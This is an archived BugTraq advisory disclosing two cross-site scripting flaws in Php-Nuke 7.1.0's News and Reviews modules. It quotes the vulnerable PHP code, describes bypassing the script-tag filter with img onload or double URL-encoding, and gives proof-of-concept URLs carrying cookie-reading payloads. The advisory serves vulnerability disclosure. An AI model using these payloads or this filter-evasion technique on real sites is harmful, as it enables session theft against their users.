BugTraq
[waraxe-2004-SA#002] - Cross-Site Scripting (XSS) in Php-Nuke 7.1.0 Feb 08 2004 08:13PM
Janek Vind (come2waraxe yahoo com)


{=======================================================================
=========}

{ [waraxe-2004-SA#002] }

{=======================================================================
=========}

{ }

{ [ Cross-Site Scripting (XSS) in Php-Nuke 7.1.0 ] }

{ }

{=======================================================================
=========}

Author: Janek Vind "waraxe"

Date: 08 Feb 2004

Location: Estonia, Tartu

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is popular freeware content management system, written in php by

Francisco Burzi. This CMS (Content Management System) is used on many thousands

websites, because it`s free of charge, easy to install and has broad set of features.

Homepage: http://phpnuke.org

Vulnerabilities:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

If we look at Php-Nuke`s history, then we can find many cases reporting the XSS

in Php-Nuke. Most of them are fixed by now, when we have allready version 7.1.0

available. Despite this I found two new cases of XSS in Php-Nuke 6.x-7.1.0 , maybe in

older versions too.

Exploit:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let`s look at code from "/modules/News/friend.php" line 84-92 (Php-Nuke 7.1.0):

function StorySent($title, $fname) {

include ("header.php");

$title = urldecode($title);

$fname = urldecode($fname);

OpenTable();

echo "<center><font class=\"content\">"._FSTORY." <b>$title</b> "._HASSENT." $fname... "._THANKS."</font></center>";

CloseTable();

include ("footer.php");

}

If we deliver $title or $fname by GET or POST variable, then we have XSS

conditions here. But Php-Nuke will reject GET and POST requests with <script> tags.

One way to evade this filter is the using of <img src=foo onload=[code here]>.

There is better way to exploit the XSS, and it`s the using of partially or fully

urlencoded ("hexed") script for exploit. And because we have lines

$title = urldecode($title);

and

$fname = urldecode($fname);

in original code, it will be urldecoded and will work for us, but GET or POST

filtering can`t recognize the "<script>" pattern.

Same problem has one more module - "Reviews".

Proof of concept examples:

http://f00bar.com/modules.php?name=News&file=friend&op=StorySent&title=%
253cscript>alert%2528document.cookie);%253c/script>

http://f00bar.com/modules.php?name=Reviews&rop=postcomment&title=%253csc
ript>alert%2528document.cookie);%253c/script>

Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ulljobu, djzone, raider and to all white-, gray-, and blackhats in Estonia!

Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe (at) yahoo (dot) com [email concealed]

Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus